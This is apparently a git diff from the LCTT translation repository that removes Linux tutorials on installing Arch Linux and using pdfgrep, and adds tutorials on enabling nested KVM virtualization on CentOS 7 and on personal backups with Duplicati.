[2]:https://i1.wp.com/blog.docker.com/wp-content/uploads/4a7666e4-ebdb-4a40-b61a-26ac7c3f663e-4.jpg?resize=906%2C470&ssl=1 (containerd)
|
||||
[3]:https://i1.wp.com/blog.docker.com/wp-content/uploads/2a73a4d8-cd40-4187-851f-6104ae3c12ba-1.jpg?resize=1140%2C680&ssl=1
|
||||
[4]:https://github.com/containerd/containerd/blob/master/api/services/tasks/v1/tasks.proto
|
||||
[5]:https://blog.mobyproject.org/where-are-containerds-graph-drivers-145fc9b7255
|
||||
[6]:https://github.com/containerd/containerd/blob/master/api/services/snapshots/v1/snapshots.proto
|
||||
[7]:https://blog.mobyproject.org/introducing-buildkit-17e056cc5317
|
||||
[8]:https://i1.wp.com/blog.docker.com/wp-content/uploads/d0fb5eb9-c561-415d-8d57-e74442a879a2-1.jpg?resize=1140%2C556&ssl=1
|
||||
[9]:https://speakerdeck.com/stevvooe/whats-happening-with-containerd-and-the-cri
|
||||
[10]:https://github.com/containerd/containerd/pull/1748
|
@ -1,283 +0,0 @@
|
||||
How to Install Arch Linux [Step by Step Guide]
|
||||
======
|
||||
**Brief: This tutorial shows you how to install Arch Linux in easy to follow steps.**
|
||||
|
||||
[Arch Linux][1] is an x86-64 general-purpose Linux distribution which has been popular among the [DIY][2] enthusiasts and hardcore Linux users. The default installation covers only a minimal base system and expects the end user to configure and use it. Based on the KISS - Keep It Simple, Stupid! principle, Arch Linux focuses on elegance, code correctness, a minimalist system and simplicity.
|
||||
|
||||
Arch Linux supports the Rolling release model and has its own package manager - [pacman][3]. With the aim to provide a cutting-edge operating system, Arch never misses out to have an up-to-date repository. The fact that it provides a minimal base system gives you a choice to install it even on low-end hardware and then install only the required packages over it.
|
||||
|
||||
Also, it's one of the most popular OSes for learning Linux from scratch. If you like to experiment with a DIY attitude, you should give Arch Linux a try. It's what many Linux users consider a core Linux experience.
|
||||
|
||||
In this article, we will see how to install and set up Arch Linux and then a desktop environment over it.
|
||||
|
||||
## How to install Arch Linux
|
||||
|
||||
![How to install Arch Linux][4]
|
||||
|
||||
![How to install Arch Linux][5]
|
||||
|
||||
The method we are going to discuss here **wipes out existing operating system** (s) from your computer and install Arch Linux on it. So if you are going to follow this tutorial, make sure that you have backed up your files or else you'll lose all of it. You have been warned.
|
||||
|
||||
But before we see how to install Arch Linux from a USB, please make sure that you have the following requirements:
|
||||
|
||||
### Requirements for installing Arch Linux:
|
||||
|
||||
* A x86_64 (i.e. 64 bit) compatible machine
|
||||
* Minimum 512 MB of RAM (recommended 2 GB)
|
||||
* At least 1 GB of free disk space (recommended 20 GB for basic usage)
|
||||
* An active internet connection
|
||||
* A USB drive with minimum 2 GB of storage capacity
|
||||
* Familiarity with Linux command line
|
||||
|
||||
|
||||
|
||||
Once you have made sure that you have all the requirements, let's proceed to install Arch Linux.
|
||||
|
||||
### Step 1: Download the ISO
|
||||
|
||||
You can download the ISO from the [official website][6]. Arch Linux requires a x86_64 (i.e. 64 bit) compatible machine with a minimum of 512 MB RAM and 800 MB disk space for a minimal installation. However, it is recommended to have 2 GB of RAM and at least 20 GB of storage for a GUI to work without hassle.
|
||||
|
||||
### Step 2: Create a live USB of Arch Linux
|
||||
|
||||
We will have to create a live USB of Arch Linux from the ISO you just downloaded.
|
||||
|
||||
If you are on Linux, you can use **dd command** to create a live USB. Replace /path/to/archlinux.iso with the path where you have downloaded ISO file, and /dev/sdx with your drive in the example below. You can get your drive information using [lsblk][7] command.
|
||||
```
|
||||
dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync
|
||||
```
|
||||
|
||||
On Windows, there are several tools to create a live USB. The recommended tool is Rufus. We have already covered a tutorial on [how to create a live USB of Antergos Linux using Rufus][8] in the past. Since Antergos is based on Arch, you can follow the same tutorial.
|
||||
|
||||
### Step 3: Boot from the live USB
|
||||
|
||||
Once you have created a live USB for Arch Linux, shut down your PC. Plug in your USB and boot your system. While booting, keep pressing F2, F10 or F12 (depending upon your system) to go into boot settings. In here, select to boot from USB or removable disk.
|
||||
|
||||
Once you select that, you should see an option like this:
|
||||
|
||||
![Arch Linux][4]
|
||||
|
||||
![Arch Linux][9]
|
||||
Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user.
|
||||
|
||||
Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user.
|
||||
|
||||
Next steps include partitioning disk, creating the filesystem and mounting it.
|
||||
|
||||
### Step 4: Partitioning the disks
|
||||
|
||||
The first step includes partitioning your hard disk. A single root partition is the simplest one where we will create a root partition (/), a swapfile and home partition.
|
||||
|
||||
I have a 19 GB disk where I want to install Arch Linux. To create a disk, type
|
||||
```
|
||||
fdisk /dev/sda
|
||||
```
|
||||
|
||||
Type "n" for a new partition. Type in "p" for a primary partition and select the partition number.
|
||||
|
||||
The First sector is automatically selected and you just need to press Enter. For Last sector, type the size you want to allocate for this partition.
|
||||
|
||||
Create two more partitions similarly for home and swap, and press 'w' to save the changes and exit.
|
||||
|
||||
![root partition][4]
|
||||
|
||||
![root partition][10]
|
||||
|
||||
### Step 4: Creating filesystem
|
||||
|
||||
Since we have created 3 different partitions, the next step is to format the partition and create a filesystem.
|
||||
|
||||
We will use mkfs for root and home partition and mkswap for creating swap space. We are formatting our disk with ext4 filesystem.
|
||||
```
|
||||
mkfs.ext4 /dev/sda1
|
||||
mkfs.ext4 /dev/sda3
|
||||
|
||||
mkswap /dev/sda2
|
||||
swapon /dev/sda2
|
||||
```
|
||||
|
||||
Let's mount these filesystems to root and home
|
||||
```
|
||||
mount /dev/sda1 /mnt
|
||||
mkdir /mnt/home
|
||||
mount /dev/sda3 /mnt/home
|
||||
```
|
||||
|
||||
### Step 5: Installation
|
||||
|
||||
Since we have created partitioning and mounted it, let's install the base package. A base package contains all the necessary package to run a system, some of which are the GNU BASH shell, data compression tool, file system utilities, C library, compression tools, Linux kernels and modules, library packages, system utilities, USB devices utilities, vi text editor etc.
|
||||
```
|
||||
pacstrap /mnt base base-devel
|
||||
```
|
||||
|
||||
### **Step 6: Configuring the system**
|
||||
|
||||
Generate a fstab file to define how disk partitions, block devices or remote file systems are mounted into the filesystem.
|
||||
```
|
||||
genfstab -U /mnt >> /mnt/etc/fstab
|
||||
```
|
||||
|
||||
Change root into the new system, this allows changing the root directory for the current running process and the child process.
|
||||
```
|
||||
arch-chroot /mnt
|
||||
```
|
||||
|
||||
Some systemd tools which require an active dbus connection cannot be used inside a chroot, hence it would be better if we exit from it. To exit chroot, simply use the below command:
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
### Step 7. Setting Timezone
|
||||
|
||||
Use below command to set the time zone.
|
||||
```
|
||||
ln -sf /usr/share/zoneinfo/<Region>/<City> /etc/localtime
|
||||
```
|
||||
|
||||
To get a list of zone, type
|
||||
```
|
||||
ls /usr/share/zoneinfo
|
||||
```
|
||||
|
||||
Run hwclock to set the hardware clock.
|
||||
```
|
||||
hwclock --systohc --utc
|
||||
```
|
||||
|
||||
### Step 8. Setting up Locale.
|
||||
|
||||
File /etc/locale.gen contains all the local settings and system language in a commented format. Open the file using vi editor and un-comment the language you prefer. I had done it for **en_GB.UTF-8**.
|
||||
|
||||
Now generate the locale config in /etc directory file using the commands below:
|
||||
```
|
||||
locale-gen
|
||||
echo LANG=en_GB.UTF-8 > /etc/locale.conf
|
||||
export LANG=en_GB.UTF-8
|
||||
```
|
||||
|
||||
### Step 9. Installing bootloader, setting up hostname and root password
|
||||
|
||||
Create a /etc/hostname file and add a matching entry to host.
|
||||
|
||||
127.0.1.1 myhostname.localdomain myhostname
|
||||
|
||||
I am adding ItsFossArch as a hostname:
|
||||
```
|
||||
echo ItsFossArch > /etc/hostname
|
||||
```
|
||||
|
||||
and then to the /etc/hosts file.
|
||||
|
||||
To install a bootloader use below commands :
|
||||
```
|
||||
pacman -S grub
|
||||
grub-install /dev/sda
|
||||
grub-mkconfig -o /boot/grub/grub.cfg
|
||||
```
|
||||
|
||||
To create root password, type
|
||||
```
|
||||
passwd
|
||||
```
|
||||
|
||||
and enter your desired password.
|
||||
|
||||
Once done, update your system. Chances are that you already have an updated system since you have downloaded the latest ISO file.
|
||||
```
|
||||
pacman -Syu
|
||||
```
|
||||
|
||||
Congratulations! You have successfully installed a minimal command line Arch Linux.
|
||||
|
||||
In the next step, we will see how to set up a desktop environment or Graphical User Interface for the Arch Linux. I am a big fan of GNOME desktop environment, and we will be working on installing the same.
|
||||
|
||||
### Step 10: Install a desktop environment (GNOME in this case)
|
||||
|
||||
Before you can install a desktop environment, you will need to configure the network first.
|
||||
|
||||
You can see the interface name with below command:
|
||||
```
|
||||
ip link
|
||||
```
|
||||
|
||||
![][4]
|
||||
|
||||
![][11]
|
||||
|
||||
For me, it's **enp0s3.**
|
||||
|
||||
Add the following entries in the file
|
||||
```
|
||||
vi /etc/systemd/network/enp0s3.network
|
||||
|
||||
[Match]
|
||||
name=en*
|
||||
[Network]
|
||||
DHCP=yes
|
||||
```
|
||||
|
||||
Save and exit. Restart your systemd network for the changes to reflect.
|
||||
```
|
||||
systemctl restart systemd-networkd
|
||||
systemctl enable systemd-networkd
|
||||
```
|
||||
|
||||
And then add the below two entries in /etc/resolv.conf file.
|
||||
```
|
||||
nameserver 8.8.8.8
|
||||
nameserver 8.8.4.4
|
||||
```
|
||||
|
||||
Next step is to install X environment.
|
||||
|
||||
Type the below command to install the Xorg as display server.
|
||||
```
|
||||
pacman -S xorg xorg-server
|
||||
```
|
||||
|
||||
gnome contains the base GNOME desktop. gnome-extra contains GNOME applications, archive manager, disk manager, text editors and more.
|
||||
```
|
||||
pacman -S gnome gnome-extra
|
||||
```
|
||||
|
||||
The last step includes enabling the display manager GDM for Arch.
|
||||
```
|
||||
systemctl start gdm.service
|
||||
systemctl enable gdm.service
|
||||
```
|
||||
|
||||
Restart your system and you can see the GNOME login screen.
|
||||
|
||||
## Final Words on Arch Linux installation
|
||||
|
||||
A similar approach has been demonstrated in this video (watch in full screen to see the commands) by It's FOSS reader Gonzalo Tormo:
|
||||
|
||||
You might have realized by now that installing Arch Linux is not as easy as [installing Ubuntu][12]. However, with a little patience, you can surely accomplish it and then tell the world that you use Arch Linux.
|
||||
|
||||
Arch Linux installation itself provides a great deal of learning. And once you have installed it, I recommend referring to its comprehensive [wiki][13] where you can find steps to install various other desktop environments and learn more about the OS. You can keep playing with it and see how powerful Arch is.
|
||||
|
||||
Let us know in the comments if you face any difficulty while installing Arch Linux.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/install-arch-linux/
|
||||
|
||||
作者:[Ambarish Kumar][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ambarish/
|
||||
[1] https://www.archlinux.org/
|
||||
[2] https://en.wikipedia.org/wiki/Do_it_yourself
|
||||
[3] https://wiki.archlinux.org/index.php/pacman
|
||||
[4] data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[5] https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png
|
||||
[6] https://www.archlinux.org/download/
|
||||
[7] https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems
|
||||
[8] https://itsfoss.com/live-usb-antergos/
|
||||
[9] https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg
|
||||
[10] https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png
|
||||
[11] https://itsfoss.com/wp-content/uploads/2017/12/11.png
|
||||
[12] https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
|
||||
[13] https://wiki.archlinux.org/
|
@ -1,65 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
How to Search PDF Files from the Terminal with pdfgrep
|
||||
======
|
||||
Command line utilities such as [grep][1] and [ack-grep][2] are great for searching plain-text files for patterns matching a specified [regular expression][3]. But have you ever tried using these utilities to search for patterns in a PDF file? Well, don't! You will not get any result as these tools cannot read PDF files; they only read plain-text files.
|
||||
|
||||
[pdfgrep][4], as the name suggests, is a small command line utility that makes it possible to search for text in a PDF file without opening the file. It is insanely fast - faster than the search provided by virtually all PDF document viewers. A great distinction between grep and pdfgrep is that pdfgrep operates on pages, whereas grep operates on lines. It also prints a single line multiple times if more than one match is found on that line. Let's look at how exactly to use the tool.
|
||||
|
||||
For Ubuntu and other Linux distros based on Ubuntu, it is pretty simple:
|
||||
```
|
||||
sudo apt install pdfgrep
|
||||
```
|
||||
|
||||
For other distros, just provide `pdfgrep` as input for the [package manager][5], and that should get it installed. You can also check out the project's [GitLab page][6], in case you want to play around with the code.
|
||||
|
||||
Now that you have the tool installed, let's go for a test run. pdfgrep command takes this format:
|
||||
```
|
||||
pdfgrep [OPTION...] PATTERN [FILE...]
|
||||
```
|
||||
|
||||
**OPTION** is a list of extra attributes to give the command such as `-i` or `--ignore-case`, which both ignore the case distinction between the regular pattern specified and the ones matching it from the file.
|
||||
|
||||
**PATTERN** is just an extended regular expression.
|
||||
|
||||
**FILE** is just the name of the file, if it is in the same working directory, or the path to the file.
|
||||
|
||||
I ran the command on Python 3.6 official documentation. The following image is the result.
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
The red highlights indicate all the places the word "queue" was encountered. Passing `-i` as option to the command included matches of the word "Queue." Remember, the case does not matter when `-i` is passed as an option.
|
||||
|
||||
pdfgrep has quite a number of interesting options to use. However, I'll cover only a few here.
|
||||
|
||||
* `-c` or `--count`: this suppresses the normal output of matches. Instead of displaying the long output of the matches, it only displays a value representing the number of times the word was encountered in the file
|
||||
* `-p` or `--page-count`: this option prints out the page numbers of matches and the number of occurrences of the pattern on the page
|
||||
* `-m` or `--max-count` [number]: specifies the maximum number of matches. That means when the number of matches is reached, the command stops reading the file.
|
||||
|
||||
|
||||
|
||||
The full list of supported options can be found in the man pages or in the pdfgrep online [documentation][8]. Don't forget pdfgrep can search multiple files at the same time, in case you're working with some bulk files. The default match highlight color can be changed by altering the GREP_COLORS environment variable.
|
||||
|
||||
The next time you think of opening up a PDF file to search for anything, think of using pdfgrep. The tool comes in handy and will save you time.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/
|
||||
|
||||
作者:[Bruno Edoh][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com
|
||||
[1] https://www.maketecheasier.com/what-is-grep-and-uses/
|
||||
[2] https://www.maketecheasier.com/ack-a-better-grep/
|
||||
[3] https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/
|
||||
[4] https://pdfgrep.org/
|
||||
[5] https://www.maketecheasier.com/install-software-in-various-linux-distros/
|
||||
[6] https://gitlab.com/pdfgrep/pdfgrep
|
||||
[7] https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search)
|
||||
[8] https://pdfgrep.org/doc.html
|
@ -0,0 +1,116 @@
|
||||
How to enable Nested Virtualization in KVM on CentOS 7 / RHEL 7
|
||||
======
|
||||
**Nested virtualization** means to configure virtualization environment inside a virtual machine. In other words we can say nested virtualization is a feature in the hypervisor which allows us to install & run a virtual machine inside a virtual server via hardware acceleration from the **hypervisor** (host).
|
||||
|
||||
In this article, we will discuss how to enable nested virtualization in KVM on CentOS 7 / RHEL 7. I am assuming you have already configured a KVM hypervisor. In case you are not familiar with how to install and configure a **KVM hypervisor** , then refer to the following article
|
||||
|
||||
Let's jump into the hypervisor and verify whether nested virtualization is enabled or not on your KVM host
|
||||
|
||||
For Intel based Processors run the command,
|
||||
```
|
||||
[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested
|
||||
N
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
For AMD based Processors run the command,
|
||||
```
|
||||
[root@kvm-hypervisor ~]# cat /sys/module/kvm_amd/parameters/nested
|
||||
N
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
In the above command output 'N' indicates that Nested virtualization is disabled. If we get the output as 'Y' then it indicates that nested virtualization is enabled on your host.
|
||||
|
||||
Now to enable nested virtualization, create a file with the name " **/etc/modprobe.d/kvm-nested.conf** " with the following content.
|
||||
```
|
||||
[root@kvm-hypervisor ~]# vi /etc/modprobe.d/kvm-nested.conf
|
||||
options kvm-intel nested=1
|
||||
options kvm-intel enable_shadow_vmcs=1
|
||||
options kvm-intel enable_apicv=1
|
||||
options kvm-intel ept=1
|
||||
```
|
||||
|
||||
Save & exit the file
|
||||
|
||||
Now remove ' **kvm_intel** ' module and then add the same module with modprobe command. Before removing the module, make sure VMs are shutdown otherwise we will get error message like " **modprobe: FATAL: Module kvm_intel is in use** "
|
||||
```
|
||||
[root@kvm-hypervisor ~]# modprobe -r kvm_intel
|
||||
[root@kvm-hypervisor ~]# modprobe -a kvm_intel
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
Now verify whether nested virtualization feature enabled or not.
|
||||
```
|
||||
[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested
|
||||
Y
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
####
|
||||
|
||||
Test Nested Virtualization
|
||||
|
||||
Let's suppose we have a VM with name "director" on KVM hypervisor on which I have enabled nested virtualization. Before testing, make sure CPU mode for the VM is either as " **host-model** " or " **host-passthrough** " , to check cpu mode of a virtual machine use either Virt-Manager GUI or virsh edit command
|
||||
|
||||
![cpu_mode_vm_kvm][1]
|
||||
|
||||
![cpu_mode_vm_kvm][2]
|
||||
|
||||
Now login to the director VM and run lscpu and lsmod command
|
||||
```
|
||||
[root@kvm-hypervisor ~]# ssh 192.168.126.1 -l root
|
||||
root@192.168.126.1's password:
|
||||
Last login: Sun Dec 10 07:05:59 2017 from 192.168.126.254
|
||||
[root@director ~]# lsmod | grep kvm
|
||||
kvm_intel 170200 0
|
||||
kvm 566604 1 kvm_intel
|
||||
irqbypass 13503 1 kvm
|
||||
[root@director ~]#
|
||||
[root@director ~]# lscpu
|
||||
```
|
||||
|
||||
![lscpu_command_rhel7_centos7][1]
|
||||
|
||||
![lscpu_command_rhel7_centos7][3]
|
||||
|
||||
Let's try creating a virtual machine either from virtual manager GUI or virt-install inside the director vm, in my case i am using virt-install command
|
||||
```
|
||||
[root@director ~]# virt-install -n Nested-VM --description "Test Nested VM" --os-type=Linux --os-variant=rhel7 --ram=2048 --vcpus=2 --disk path=/var/lib/libvirt/images/nestedvm.img,bus=virtio,size=10 --graphics none --location /var/lib/libvirt/images/CentOS-7-x86_64-DVD-1511.iso --extra-args console=ttyS0
|
||||
Starting install...
|
||||
Retrieving file .treeinfo... | 1.1 kB 00:00:00
|
||||
Retrieving file vmlinuz... | 4.9 MB 00:00:00
|
||||
Retrieving file initrd.img... | 37 MB 00:00:00
|
||||
Allocating 'nestedvm.img' | 10 GB 00:00:00
|
||||
Connected to domain Nested-VM
|
||||
Escape character is ^]
|
||||
[ 0.000000] Initializing cgroup subsys cpuset
|
||||
[ 0.000000] Initializing cgroup subsys cpu
|
||||
[ 0.000000] Initializing cgroup subsys cpuacct
|
||||
[ 0.000000] Linux version 3.10.0-327.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Nov 19 22:10:57 UTC 2015
|
||||
………………………………………………
|
||||
```
|
||||
|
||||
![cli-installer-virt-install-command-kvm][1]
|
||||
|
||||
![cli-installer-virt-install-command-kvm][4]
|
||||
|
||||
This confirms that nested virtualization has been enabled successfully as we are able to create virtual machine inside a virtual machine.
|
||||
|
||||
This Concludes the article, please do share your feedback and comments.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linuxtechi.com/enable-nested-virtualization-kvm-centos-7-rhel-7/
|
||||
|
||||
作者:[Pradeep Kumar][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linuxtechi.com
|
||||
[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
|
||||
[2]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cpu_mode_vm_kvm.jpg
|
||||
[3]:https://www.linuxtechi.com/wp-content/uploads/2017/12/lscpu_command_rhel7_centos7-1024x408.jpg
|
||||
[4]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cli-installer-virt-install-command-kvm.jpg
|
@ -0,0 +1,314 @@
|
||||
Personal Backups with Duplicati on Linux
|
||||
======
|
||||
|
||||
This tutorial is for performing personal backups to local USB hard drives, having encryption, deduplication and compression.
|
||||
|
||||
The procedure was tested using [Duplicati 2.0.2.1][1] on [Debian 9.2][2]
|
||||
|
||||
### Duplicati Installation
|
||||
|
||||
Download the latest version from <https://www.duplicati.com/download>
|
||||
|
||||
The software requires several libraries to work, mostly mono libraries. The easiest way to install the software is to let it fail the installation through dpkg and then install the missing packages with apt-get:
|
||||
|
||||
sudo dpkg -i duplicati_2.0.2.1-1_all.deb
|
||||
sudo apt-get --fix-broken install
|
||||
|
||||
Note that the installation of the package fails on the first instance, then we use apt to install the dependencies.
|
||||
|
||||
Start the daemon:
|
||||
|
||||
sudo systemctl start duplicati.service
|
||||
|
||||
And if you wish for it to start automatically with the OS use:
|
||||
|
||||
sudo systemctl enable duplicati.service
|
||||
|
||||
To check that the service is running:
|
||||
|
||||
netstat -ltn | grep 8200
|
||||
|
||||
And you should receive a response like this one:
|
||||
|
||||
[![][3]][4]
|
||||
|
||||
After these steps you should be able to run the browser and access the local web service at http://localhost:8200
|
||||
|
||||
[![][5]][6]
|
||||
|
||||
### Create a Backup Job
|
||||
|
||||
Go to "Add backup" to configure a new backup job:
|
||||
|
||||
[![][7]][8]
|
||||
|
||||
Set a name for the job and a passphrase for encryption. You will need the passphrase to restore files, so pick a strong password and make sure you don't forget it:
|
||||
|
||||
[![][9]][10]
|
||||
|
||||
Set the destination: the directory where you are going to store the backup files:
|
||||
|
||||
[![][11]][12]
|
||||
|
||||
Select the source files to backup. I will pick just the Desktop folder for this example:
|
||||
|
||||
[![][13]][14]
|
||||
|
||||
Specify filters and exclusions if necessary:
|
||||
|
||||
[![][15]][16]
|
||||
|
||||
Configure a schedule, or disable automatic backups if you prefer to run them manually:
|
||||
|
||||
[![][17]][18]
|
||||
|
||||
I like to use manual backups when using USB drive destinations, and scheduled if I have a server to send backups through SSH or a Cloud based destination.
|
||||
|
||||
Specify the versions to keep, and the Upload volume size (size of each partial file):
|
||||
|
||||
[![][19]][20]
|
||||
|
||||
Finally you should see the job created in a summary like this:
|
||||
|
||||
[![][21]][22]
|
||||
|
||||
### Run the Backup
|
||||
|
||||
In the summary just shown, under Home, click "run now" to start the backup job. A progress bar will appear at the top of the screen.
|
||||
|
||||
After finishing the backup, you can see in the destination folder, a set of files called something like:
|
||||
```
|
||||
duplicati-20171206T143926Z.dlist.zip.aes
|
||||
duplicati-bdfad38a0b1f34b5db56c1de166260cd8.dblock.zip.aes
|
||||
duplicati-i00d8dff418a749aa9d67d0c54b0e4149.dindex.zip.aes
|
||||
```
|
||||
|
||||
The size of the blocks will be the one specified in the Upload volume size option. The files are compressed, and encrypted using the previously set passphrase.
|
||||
|
||||
Once finished, you will see in the summary the last backup taken and the size:
|
||||
|
||||
[![][23]][24]
|
||||
|
||||
In this case it is only 1MB because I took a test folder.
|
||||
|
||||
### Restore Files
|
||||
|
||||
To restore files, simply access the web administration in http://localhost:8200, go to the "Restore" menu and select the backup job name. Then select the files to restore and click "continue":
|
||||
|
||||
[![][25]][26]
|
||||
|
||||
Select the restore files or folders and the restoration options:
|
||||
|
||||
[![][27]][28]
|
||||
|
||||
The restoration will start running, showing a progress bar on the top of the user interface.
|
||||
|
||||
### Fixate the backup destination
|
||||
|
||||
If you use a USB drive to perform the backups, it is a good idea to specify in the /etc/fstab the UUID of the drive, so that it always mounts automatically in the /mnt/backup directory (or the directory of your choosing).
|
||||
|
||||
To do so, connect your drive and check for the UUID:
|
||||
|
||||
sudo blkid
|
||||
```
|
||||
...
|
||||
/dev/sdb1: UUID="4d608d85-e138-4546-9f22-4d78bef0b6a7" TYPE="ext4" PARTUUID="983a72cb-01"
|
||||
...
|
||||
```
|
||||
|
||||
And copy the UUID to include an entry in the /etc/fstab file:
|
||||
```
|
||||
...
|
||||
UUID=4d608d85-e138-4546-9f22-4d78bef0b6a7 /mnt/backup ext4 defaults 0 0
|
||||
...
|
||||
```
|
||||
|
||||
### Remote Access to the GUI
|
||||
|
||||
By default, Duplicati listens on localhost only, and it's meant to be that way. However it includes the possibility to add a password and to be accessible from the network:
|
||||
|
||||
[![][29]][30]
|
||||
|
||||
This setting is not recommended, as Duplicati has no SSL capabilities yet. What I would recommend if you need to use the backup GUI remotely, is using an SSH tunnel.
|
||||
|
||||
To accomplish this, first enable SSH server in case you don't have it yet, the easiest way is running:
|
||||
|
||||
sudo tasksel
|
||||
|
||||
[![][31]][32]
|
||||
|
||||
Once you have the SSH server running on the Duplicati host, go to the computer from which you want to connect to the GUI and set up the tunnel.
|
||||
|
||||
Let's consider that:
|
||||
|
||||
* Duplicati backups and its GUI are running in the remote host 192.168.0.150 (that we call the server).
|
||||
* The GUI on the server is listening on port 8200.
|
||||
* jorge is a valid user name in the server.
|
||||
* I will access the GUI from a host on the local port 12345.
|
||||
|
||||
|
||||
|
||||
Then to open an SSH tunnel I run on the client:
|
||||
|
||||
ssh -f jorge@192.168.0.150 -L 12345:localhost:8200 -N
|
||||
|
||||
With netstat it can be checked that the port is open for localhost:
|
||||
|
||||
netstat -ltn | grep :12345
|
||||
```
|
||||
tcp 0 0 127.0.0.1:12345 0.0.0.0:* LISTEN
|
||||
tcp6 0 0 ::1:12345 :::* LISTEN
|
||||
```
|
||||
|
||||
And now I can access the remote GUI by accessing http://127.0.0.1:12345 from the client browser
|
||||
|
||||
[![][34]][35]
|
||||
|
||||
Finally if you want to close the connection to the SSH tunnel you may kill the ssh process. First identify the PID:
|
||||
|
||||
ps x | grep "[s]sh -f"
|
||||
```
|
||||
26348 ? Ss 0:00 ssh -f [[email protected]][33] -L 12345:localhost:8200 -N
|
||||
```
|
||||
|
||||
And kill it:
|
||||
|
||||
kill -9 26348
|
||||
|
||||
Or you can do it all in one:
|
||||
|
||||
kill -9 $(ps x | grep "[s]sh -f" | cut -d" " -f1)
|
||||
|
||||
### Other Backup Repository Options
|
||||
|
||||
If you prefer to store your backups on a remote server rather than on a local hard drive, Duplicati has several options. Standard protocols such as:
|
||||
|
||||
* FTP
|
||||
* OpenStack Object Storage / Swift
|
||||
* SFTP (SSH)
|
||||
* WebDAV
|
||||
|
||||
|
||||
|
||||
And a wider list of proprietary protocols, such as:
|
||||
|
||||
* Amazon Cloud Drive
|
||||
* Amazon S3
|
||||
* Azure
|
||||
* B2 Cloud Storage
|
||||
* Box.com
|
||||
* Dropbox
|
||||
* Google Cloud Storage
|
||||
* Google Drive
|
||||
* HubiC
|
||||
* Jottacloud
|
||||
* mega.nz
|
||||
* Microsoft One Drive
|
||||
* Microsoft One Drive for Business
|
||||
* Microsoft Sharepoint
|
||||
* OpenStack Simple Storage
|
||||
* Rackspace CloudFiles
|
||||
|
||||
|
||||
|
||||
For FTP, SFTP, WebDAV is as simple as setting the server hostname or IP address, adding credentials and then using the whole previous process. As a result, I don't believe it is of any value describing them.
|
||||
|
||||
However, as I find it useful for personal matters having a cloud based backup, I will describe the configuration for Dropbox, which uses the same procedure as for Google Drive and Microsoft OneDrive.
|
||||
|
||||
#### Dropbox
|
||||
|
||||
Let's create a new backup job and set the destination to Dropbox. All the configurations are exactly the same except for the destination that should be set like this:
|
||||
|
||||
[![][36]][37]
|
||||
|
||||
Once you set up "Dropbox" from the drop-down menu, and configured the destination folder, click on the OAuth link to set the authentication.
|
||||
|
||||
A pop-up will emerge for you to login to Dropbox (or Google Drive or OneDrive depending on your choosing):
|
||||
|
||||
[![][38]][39]
|
||||
|
||||
After logging in, you will be prompted to allow the Duplicati app to access your cloud storage:
|
||||
|
||||
[![][40]][41]
|
||||
|
||||
After finishing the last process, the AuthID field will be automatically filled in:
|
||||
|
||||
[![][42]][43]
|
||||
|
||||
Click on "Test Connection". When testing the connection you will be asked to create the folder in the case it does not exist:
|
||||
|
||||
[![][44]][45]
|
||||
|
||||
And finally it will give you a notification that the connection is successful:
|
||||
|
||||
[![][46]][47]
|
||||
|
||||
If you access your Dropbox account you will see the files, in the same format that we have seen before, under the defined folder:
|
||||
|
||||
[![][48]][49]
|
||||
|
||||
### Conclusions
|
||||
|
||||
Duplicati is a multi-platform, feature-rich, easy to use backup solution for personal computers. It supports a wide variety of backup repositories, which makes it a very versatile tool that can adapt to most personal needs.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.howtoforge.com/tutorial/personal-backups-with-duplicati-on-linux/
|
||||
|
||||
作者:[][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
